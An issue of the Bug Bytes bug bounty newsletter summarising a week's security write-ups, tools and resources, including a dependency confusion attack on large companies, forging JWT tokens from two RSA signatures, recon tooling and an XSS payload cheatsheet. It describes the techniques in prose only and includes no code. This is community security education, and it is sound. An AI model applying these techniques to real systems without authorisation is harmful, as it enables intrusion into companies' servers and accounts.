Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources.
This issue covers the week from February 1st to February 8.
Our favorite 5 hacking items
1. Writeup of the week
Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies
Wow, this is such a great writeup! If you don’t have time to check out anything else, just read this for a dose of mindblowing Web security research. Alex Birsan (@alxbrsn) explains an attack he calls “dependency confusion” that affected big companies.
In a nutshell: If a company uses a private package to install Python, Ruby or Node dependencies and a public repository is created with the same name and a latest version, the package manager will give preference to the public package. It makes it possible to run code on the target’s internal servers and developers’ PCs. That’s how Alex pwned Paypal, Shopify, Apple, Microsoft and many more.
2. Article of the week
Abusing JWT Public Keys Without The Public Key & rsa_sig2n
Silent Signal researchers had to test an RSA implementation but did not have the public keys used to verify signatures. So, they came up with a new technique to derive public keys from just two signatures. The most interesting bit for bug hunters is that it helps forge JWT tokens as shown in the PoC exploiting CVE-2017-11424 (a key confusion vulnerability in pyJWT).
3. Tools of the week
dwn & dwn – a docker pwn tool manager experiment
UDdup is a handy Python tool that detects similar endpoints (e.g. /product/123?is_prod=false and /product/222?is_debug=true) in a list and removes them. This is helpful for removing redundant URLs from the output of recon tools like gau or waybackurls.
dwn is a “docker-compose for hackers”. @leonjza created it to solve some limitations of docker-compose. It allows you to run dockerized tools from any folder with the ability to make on-the-fly configuration changes, dynamic port maps and volume mounts (all of which aren’t possible with docker-compose).
4. Videos of the week
Recon and Corporate OSINT with DNSGrep and Rapid7 Open Data
Live Recon and Google Dorking on the Department of Defenses Vuln Disclosure Program with @thedawgyg
These videos will be very informative if you want to improve your recon. @codingo_ shares why using sources directly (as opposed to running multiple subdomain enumeration tools) can be benefial and how to do it, with a focus on the Rapid7 Open data project.
In the second video, @thedawgyg does some live recon on the Department of Defense’s Vulneability Disclosure Program and shows @NahamSec his approach and tips.
5. Resource of the week
Cheatsheet: XSS that works in 2021
This is a new cool cheatsheet full of XSS payloads, filter bypasses and tips that work in modern browsers.
Other amazing things we stumbled upon this week
Webinars & Webcasts
Medium to advanced
Responsible(ish) disclosure writeups
Bug bounty writeups
See more writeups on The list of bug bounty writeups.
Misc. pentest & bug bounty resources
Bug bounty & Pentest news
Community pick of the week
We’d love to hear from you too about your bug bounty wins, swag and joys. Tag us on social media if you want to share them with other Bug Bytes readers.